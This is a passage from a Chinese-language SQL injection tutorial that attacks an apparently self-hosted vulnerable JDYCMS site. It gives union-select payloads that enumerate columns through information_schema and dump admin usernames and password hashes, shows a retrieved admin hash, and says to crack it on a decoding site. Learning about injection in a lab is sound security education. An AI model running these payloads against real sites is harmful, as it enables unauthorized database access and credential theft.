SQL注入实战之联合查询篇(含漏洞网站搭建) (2)

爆列
输入命令:and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=0x6a6479636d73 and table_name=0x6a64795f61646d696e

SQL注入实战之联合查询篇(含漏洞网站搭建)

爆内容
输入命令:and 1=2 union select 1,group_concat(concat_ws(0x7e,username,password)),3,4,5 from jdycms.jdy_admin
此处同时使用了concat_ws()和group_concat()两个函数,详细使用说明可以自己查询哦。0x7e就是波浪线,波浪线连接用户名和密码。

SQL注入实战之联合查询篇(含漏洞网站搭建)

admin~b9be11166d72e9e3ae7fd407165e4bd2
 最后我们登录解码网站解码

SQL注入实战之联合查询篇(含漏洞网站搭建)

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zgfwjw.html